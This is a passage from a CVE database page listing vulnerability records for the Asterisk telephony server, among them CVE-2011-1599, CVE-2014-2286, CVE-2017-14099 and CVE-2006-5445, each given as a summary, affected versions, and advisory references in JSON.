            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2011/1188"
          },
          {
            "name": "FEDORA-2011-5835",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058922.html"
          },
          {
            "name": "DSA-2225",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2011/dsa-2225"
          },
          {
            "name": "[oss-security] 20110422 Re: CVE Request -- Asterisk Security Vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://openwall.com/lists/oss-security/2011/04/22/6"
          },
          {
            "name": "47537",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/47537"
          },
          {
            "name": "ADV-2011-1086",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2011/1086"
          },
          {
            "name": "1025433",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1025433"
          },
          {
            "name": "ADV-2011-1107",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2011/1107"
          },
          {
            "name": "44529",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/44529"
          },
          {
            "name": "FEDORA-2011-6208",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-May/059702.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.digium.com/pub/security/AST-2011-006.html"
          },
          {
            "name": "44197",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/44197"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2011-04-21T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "manager.c in the Manager Interface in Asterisk Open Source 1.4.x before 1.4.40.1, 1.6.1.x before 1.6.1.25, 1.6.2.x before 1.6.2.17.3, and 1.8.x before 1.8.3.3 and Asterisk Business Edition C.x.x before C.3.6.4 does not properly check for the system privilege, which allows remote authenticated users to execute arbitrary commands via an Originate action that has an Async header in conjunction with an Application header."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2011-08-23T09:00:00",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "ADV-2011-1188",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2011/1188"
        },
        {
          "name": "FEDORA-2011-5835",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058922.html"
        },
        {
          "name": "DSA-2225",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2011/dsa-2225"
        },
        {
          "name": "[oss-security] 20110422 Re: CVE Request -- Asterisk Security Vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://openwall.com/lists/oss-security/2011/04/22/6"
        },
        {
          "name": "47537",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/47537"
        },
        {
          "name": "ADV-2011-1086",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2011/1086"
        },
        {
          "name": "1025433",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1025433"
        },
        {
          "name": "ADV-2011-1107",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2011/1107"
        },
        {
          "name": "44529",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/44529"
        },
        {
          "name": "FEDORA-2011-6208",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-May/059702.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.digium.com/pub/security/AST-2011-006.html"
        },
        {
          "name": "44197",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/44197"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2011-1599",
    "datePublished": "2011-04-27T00:00:00",
    "dateReserved": "2011-04-05T00:00:00",
    "dateUpdated": "2024-08-06T22:28:41.962Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-2286

Vulnerability from cvelistv5

Published

2014-04-18 19:00

Modified

2024-08-06 10:06

Severity ?

Summary

main/http.c in Asterisk Open Source 1.8.x before 1.8.26.1, 11.8.x before 11.8.1, and 12.1.x before 12.1.1, and Certified Asterisk 1.8.x before 1.8.15-cert5 and 11.6 before 11.6-cert2, allows remote attackers to cause a denial of service (stack consumption) and possibly execute arbitrary code via an HTTP request with a large number of Cookie headers.

References

▼	URL	Tags
	https://issues.asterisk.org/jira/browse/ASTERISK-23340	x_refsource_CONFIRM
	http://downloads.asterisk.org/pub/security/AST-2014-001-1.8.diff	x_refsource_MISC
	http://downloads.asterisk.org/pub/security/AST-2014-001.html	x_refsource_CONFIRM
	http://www.securityfocus.com/bid/66093	vdb-entry, x_refsource_BID
	http://www.mandriva.com/security/advisories?name=MDVSA-2014:078	vendor-advisory, x_refsource_MANDRIVA
	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html	vendor-advisory, x_refsource_FEDORA
	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html	vendor-advisory, x_refsource_FEDORA

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T10:06:00.334Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23340"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-001-1.8.diff"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-001.html"
          },
          {
            "name": "66093",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/66093"
          },
          {
            "name": "MDVSA-2014:078",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2014:078"
          },
          {
            "name": "FEDORA-2014-3762",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
          },
          {
            "name": "FEDORA-2014-3779",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-03-10T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "main/http.c in Asterisk Open Source 1.8.x before 1.8.26.1, 11.8.x before 11.8.1, and 12.1.x before 12.1.1, and Certified Asterisk 1.8.x before 1.8.15-cert5 and 11.6 before 11.6-cert2, allows remote attackers to cause a denial of service (stack consumption) and possibly execute arbitrary code via an HTTP request with a large number of Cookie headers."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2014-04-18T18:57:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23340"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-001-1.8.diff"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-001.html"
        },
        {
          "name": "66093",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/66093"
        },
        {
          "name": "MDVSA-2014:078",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2014:078"
        },
        {
          "name": "FEDORA-2014-3762",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
        },
        {
          "name": "FEDORA-2014-3779",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-2286",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "main/http.c in Asterisk Open Source 1.8.x before 1.8.26.1, 11.8.x before 11.8.1, and 12.1.x before 12.1.1, and Certified Asterisk 1.8.x before 1.8.15-cert5 and 11.6 before 11.6-cert2, allows remote attackers to cause a denial of service (stack consumption) and possibly execute arbitrary code via an HTTP request with a large number of Cookie headers."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-23340",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23340"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-001-1.8.diff",
              "refsource": "MISC",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-001-1.8.diff"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-001.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-001.html"
            },
            {
              "name": "66093",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/66093"
            },
            {
              "name": "MDVSA-2014:078",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2014:078"
            },
            {
              "name": "FEDORA-2014-3762",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
            },
            {
              "name": "FEDORA-2014-3779",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-2286",
    "datePublished": "2014-04-18T19:00:00",
    "dateReserved": "2014-03-05T00:00:00",
    "dateUpdated": "2024-08-06T10:06:00.334Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2017-14099

Vulnerability from cvelistv5

Published

2017-09-02 16:00

Modified

2024-08-05 19:20

Severity ?

Summary

In res/res_rtp_asterisk.c in Asterisk 11.x before 11.25.2, 13.x before 13.17.1, and 14.x before 14.6.1 and Certified Asterisk 11.x before 11.6-cert17 and 13.x before 13.13-cert5, unauthorized data disclosure (media takeover in the RTP stack) is possible with careful timing by an attacker. The "strictrtp" option in rtp.conf enables a feature of the RTP stack that learns the source address of media for a session and drops any packets that do not originate from the expected address. This option is enabled by default in Asterisk 11 and above. The "nat" and "rtp_symmetric" options (for chan_sip and chan_pjsip, respectively) enable symmetric RTP support in the RTP stack. This uses the source address of incoming media as the target address of any sent media. This option is not enabled by default, but is commonly enabled to handle devices behind NAT. A change was made to the strict RTP support in the RTP stack to better tolerate late media when a reinvite occurs. When combined with the symmetric RTP support, this introduced an avenue where media could be hijacked. Instead of only learning a new address when expected, the new code allowed a new source address to be learned at all times. If a flood of RTP traffic was received, the strict RTP support would allow the new address to provide media, and (with symmetric RTP enabled) outgoing traffic would be sent to this new address, allowing the media to be hijacked. Provided the attacker continued to send traffic, they would continue to receive traffic as well.

References

▼	URL	Tags
	https://security.gentoo.org/glsa/201710-29	vendor-advisory, x_refsource_GENTOO
	https://issues.asterisk.org/jira/browse/ASTERISK-27013	x_refsource_CONFIRM
	http://www.debian.org/security/2017/dsa-3964	vendor-advisory, x_refsource_DEBIAN
	http://www.securitytracker.com/id/1039251	vdb-entry, x_refsource_SECTRACK
	http://downloads.asterisk.org/pub/security/AST-2017-005.html	x_refsource_CONFIRM
	https://bugs.debian.org/873907	x_refsource_CONFIRM
	https://rtpbleed.com	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T19:20:39.853Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "GLSA-201710-29",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "https://security.gentoo.org/glsa/201710-29"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27013"
          },
          {
            "name": "DSA-3964",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2017/dsa-3964"
          },
          {
            "name": "1039251",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1039251"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2017-005.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugs.debian.org/873907"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://rtpbleed.com"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2017-09-02T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "In res/res_rtp_asterisk.c in Asterisk 11.x before 11.25.2, 13.x before 13.17.1, and 14.x before 14.6.1 and Certified Asterisk 11.x before 11.6-cert17 and 13.x before 13.13-cert5, unauthorized data disclosure (media takeover in the RTP stack) is possible with careful timing by an attacker. The \"strictrtp\" option in rtp.conf enables a feature of the RTP stack that learns the source address of media for a session and drops any packets that do not originate from the expected address. This option is enabled by default in Asterisk 11 and above. The \"nat\" and \"rtp_symmetric\" options (for chan_sip and chan_pjsip, respectively) enable symmetric RTP support in the RTP stack. This uses the source address of incoming media as the target address of any sent media. This option is not enabled by default, but is commonly enabled to handle devices behind NAT. A change was made to the strict RTP support in the RTP stack to better tolerate late media when a reinvite occurs. When combined with the symmetric RTP support, this introduced an avenue where media could be hijacked. Instead of only learning a new address when expected, the new code allowed a new source address to be learned at all times. If a flood of RTP traffic was received, the strict RTP support would allow the new address to provide media, and (with symmetric RTP enabled) outgoing traffic would be sent to this new address, allowing the media to be hijacked. Provided the attacker continued to send traffic, they would continue to receive traffic as well."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-11-03T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "GLSA-201710-29",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "https://security.gentoo.org/glsa/201710-29"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27013"
        },
        {
          "name": "DSA-3964",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2017/dsa-3964"
        },
        {
          "name": "1039251",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1039251"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2017-005.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugs.debian.org/873907"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://rtpbleed.com"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-14099",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "In res/res_rtp_asterisk.c in Asterisk 11.x before 11.25.2, 13.x before 13.17.1, and 14.x before 14.6.1 and Certified Asterisk 11.x before 11.6-cert17 and 13.x before 13.13-cert5, unauthorized data disclosure (media takeover in the RTP stack) is possible with careful timing by an attacker. The \"strictrtp\" option in rtp.conf enables a feature of the RTP stack that learns the source address of media for a session and drops any packets that do not originate from the expected address. This option is enabled by default in Asterisk 11 and above. The \"nat\" and \"rtp_symmetric\" options (for chan_sip and chan_pjsip, respectively) enable symmetric RTP support in the RTP stack. This uses the source address of incoming media as the target address of any sent media. This option is not enabled by default, but is commonly enabled to handle devices behind NAT. A change was made to the strict RTP support in the RTP stack to better tolerate late media when a reinvite occurs. When combined with the symmetric RTP support, this introduced an avenue where media could be hijacked. Instead of only learning a new address when expected, the new code allowed a new source address to be learned at all times. If a flood of RTP traffic was received, the strict RTP support would allow the new address to provide media, and (with symmetric RTP enabled) outgoing traffic would be sent to this new address, allowing the media to be hijacked. Provided the attacker continued to send traffic, they would continue to receive traffic as well."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "GLSA-201710-29",
              "refsource": "GENTOO",
              "url": "https://security.gentoo.org/glsa/201710-29"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-27013",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27013"
            },
            {
              "name": "DSA-3964",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2017/dsa-3964"
            },
            {
              "name": "1039251",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1039251"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2017-005.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2017-005.html"
            },
            {
              "name": "https://bugs.debian.org/873907",
              "refsource": "CONFIRM",
              "url": "https://bugs.debian.org/873907"
            },
            {
              "name": "https://rtpbleed.com",
              "refsource": "MISC",
              "url": "https://rtpbleed.com"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2017-14099",
    "datePublished": "2017-09-02T16:00:00",
    "dateReserved": "2017-08-31T00:00:00",
    "dateUpdated": "2024-08-05T19:20:39.853Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2006-5445

Vulnerability from cvelistv5

Published

2006-10-23 17:00

Modified

2024-08-07 19:48

Severity ?

Summary

Unspecified vulnerability in the SIP channel driver (channels/chan_sip.c) in Asterisk 1.2.x before 1.2.13 and 1.4.x before 1.4.0-beta3 allows remote attackers to cause a denial of service (resource consumption) via unspecified vectors that result in the creation of "a real pvt structure" that uses more resources than necessary.

References

▼	URL	Tags
	http://www.vupen.com/english/advisories/2006/4098	vdb-entry, x_refsource_VUPEN
	http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13	x_refsource_CONFIRM
	http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml	vendor-advisory, x_refsource_GENTOO
	http://www.securityfocus.com/bid/20835	vdb-entry, x_refsource_BID
	http://www.novell.com/linux/security/advisories/2006_69_asterisk.html	vendor-advisory, x_refsource_SUSE
	https://exchange.xforce.ibmcloud.com/vulnerabilities/29664	vdb-entry, x_refsource_XF
	http://secunia.com/advisories/22651	third-party-advisory, x_refsource_SECUNIA
	http://www.securityfocus.com/archive/1/449183/100/0/threaded	vendor-advisory, x_refsource_OPENPKG
	http://www.asterisk.org/node/110	x_refsource_CONFIRM
	http://secunia.com/advisories/22979	third-party-advisory, x_refsource_SECUNIA
	http://www.asterisk.org/node/109	x_refsource_CONFIRM
	http://www.osvdb.org/29973	vdb-entry, x_refsource_OSVDB

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T19:48:30.533Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "ADV-2006-4098",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/4098"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13"
          },
          {
            "name": "GLSA-200610-15",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
          },
          {
            "name": "20835",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/20835"
          },
          {
            "name": "SUSE-SA:2006:069",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://www.novell.com/linux/security/advisories/2006_69_asterisk.html"
          },
          {
            "name": "asterisk-channeldriver-dos(29664)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29664"
          },
          {
            "name": "22651",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/22651"
          },
          {
            "name": "OpenPKG-SA-2006.024",
            "tags": [
              "vendor-advisory",
              "x_refsource_OPENPKG",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/449183/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.asterisk.org/node/110"
          },
          {
            "name": "22979",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/22979"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.asterisk.org/node/109"
          },
          {
            "name": "29973",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://www.osvdb.org/29973"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2006-10-18T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Unspecified vulnerability in the SIP channel driver (channels/chan_sip.c) in Asterisk 1.2.x before 1.2.13 and 1.4.x before 1.4.0-beta3 allows remote attackers to cause a denial of service (resource consumption) via unspecified vectors that result in the creation of \"a real pvt structure\" that uses more resources than necessary."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-17T20:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "ADV-2006-4098",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/4098"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13"
        },
        {
          "name": "GLSA-200610-15",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
        },
        {
          "name": "20835",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/20835"
        },
        {
          "name": "SUSE-SA:2006:069",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://www.novell.com/linux/security/advisories/2006_69_asterisk.html"
        },
        {
          "name": "asterisk-channeldriver-dos(29664)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29664"
        },
        {
          "name": "22651",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/22651"
        },
        {
          "name": "OpenPKG-SA-2006.024",
          "tags": [
            "vendor-advisory",
            "x_refsource_OPENPKG"
          ],
          "url": "http://www.securityfocus.com/archive/1/449183/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.asterisk.org/node/110"
        },
        {
          "name": "22979",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/22979"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.asterisk.org/node/109"
        },
        {
          "name": "29973",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://www.osvdb.org/29973"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2006-5445",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Unspecified vulnerability in the SIP channel driver (channels/chan_sip.c) in Asterisk 1.2.x before 1.2.13 and 1.4.x before 1.4.0-beta3 allows remote attackers to cause a denial of service (resource consumption) via unspecified vectors that result in the creation of \"a real pvt structure\" that uses more resources than necessary."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "ADV-2006-4098",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/4098"
            },
            {
